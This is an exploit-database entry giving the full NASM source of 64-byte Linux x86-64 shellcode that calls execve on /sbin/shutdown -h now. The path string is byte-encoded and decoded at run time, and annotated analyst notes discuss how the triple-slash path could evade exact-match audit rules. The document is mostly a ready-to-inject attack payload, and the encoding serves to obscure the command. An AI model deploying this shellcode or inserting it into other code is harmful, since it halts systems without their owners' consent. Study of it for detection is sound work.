
Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes)

Author: Keyman
type: 
platform: linux_x86-64
port: 64.0
date_added: 2018-01-15 
date_updated: 2018-01-15 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

; ===================================================================
; Optimized version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-877.php
; Author: SLAE64-1351 (Keyman)
; Date: 14/09/2014
;
; Length: 64 bytes (got shorter by 1 byte :D )
;
; What's new is that some optimization was performed on the
; original code which left some space to do a basic decoding of the
; command (/sbin/shutdown). Each byte (except the first one) was
; decremented by 1. The decoder just adds 1 to each byte.
;
; ===================================================================

section .text
global _start

; -------------------------------------------------------------------
; _start -- issues execve() for the shutdown binary with the strings
;           "-h" and "now" as its argument vector.
;
; Syntax: NASM (Intel operand order). Target: Linux x86-64, raw syscall.
; At the syscall: rax = 59, rdi = path, rsi = argv array, rdx = 0.
;
; Analyst notes (all derived from the code below):
;  * The decoder (do_add) writes to the bytes at c_1, and c_1 lives in
;    section .text. The code therefore only works from memory that is
;    both writable and executable; on a read-only text mapping (W^X)
;    the first `add byte [...]` faults before any syscall is made.
;  * The decoded path is "///sbin/shutdown" (three leading slashes),
;    not the literal "/sbin/shutdown". A rule that matches the raw
;    path argument against the exact string would miss it; matching on
;    the resolved executable is more robust.
;    NOTE(review): confirm how your audit tooling reports the path.
;  * The argv array is { "-h", "now", NULL }: there is no separate
;    program-name entry, so "-h" sits in the argv[0] slot.
;  * c_1 carries no terminating zero byte of its own; the path is a
;    valid C string only if the byte following c_1 in memory is zero.
;  * The syscall result is never checked. If execve returns, execution
;    falls through into `shutdown:` and the decoder runs a second time
;    over already-decoded bytes.
; -------------------------------------------------------------------

_start:

xor rax, rax                ; rax = 0 (source of NUL bytes / NULL pointers)
cdq                         ; sign-extend eax into edx -> rdx = 0 (third syscall argument)

; -------------------------------------------------------------------
; 1. store '-h' on stack
; -------------------------------------------------------------------

push rax                    ; eight zero bytes: terminator for the string pushed next
push word 0x682d            ; two bytes 2d 68 = "-h" (little-endian)
push rsp
pop rcx                     ; rcx -> "-h"

; -------------------------------------------------------------------
; 2. store 'now' on stack
; -------------------------------------------------------------------

push rax                    ; eight zero bytes
push byte 0x77              ; 'w'; an imm8 push is extended to 8 bytes in 64-bit mode, so zeros follow it
push word 0x6f6e            ; two bytes 6e 6f = "no", giving "now" followed by zeros at rsp
push rsp
pop rbx                     ; rbx -> "now"

; Build the pointer array on the stack, last element first.
push rax                    ; NULL terminator of the array
push rbx                    ; pointer to "now"
push rcx                    ; pointer to "-h"

; -------------------------------------------------------------------
; 3. take the argv pointer, then locate and decode the path string
;    (the path is embedded after the call at `shutdown:`, not pushed
;    on the stack)
; -------------------------------------------------------------------

push rsp
pop rsi                     ; rsi -> { "-h", "now", NULL }

push rax                    ; pushes a zero qword; NOTE(review): no later instruction reads it, purpose not evident here
jmp shutdown                ; jmp-call-pop: the call below pushes the address of c_1
cont:
pop rdi                     ; rdi = return address pushed by `call cont` = address of c_1

push 15
pop rcx                     ; rcx = 15: number of bytes to decode

; Decode loop: adds 1 to the bytes at offsets 15 down to 1 from rdi.
; `loop` decrements rcx and branches while it is non-zero, so offset 0
; (the first byte, 0x2f) is left unchanged.
do_add:
    add byte [rdi+rcx], 0x01    ; in-place write into the code region (needs writable memory)
    loop do_add

push 59
pop rax                     ; rax = 59, the execve syscall number on Linux x86-64
syscall                     ; execve(rdi, rsi, rdx); return value is not checked

shutdown:
    call cont               ; pushes the address of the next byte (c_1) and jumps back
    ; 16 bytes: the first is a literal '/', the remaining 15 are stored as (value - 1).
    ; After decoding they read "///sbin/shutdown". No zero byte follows in this listing.
    c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d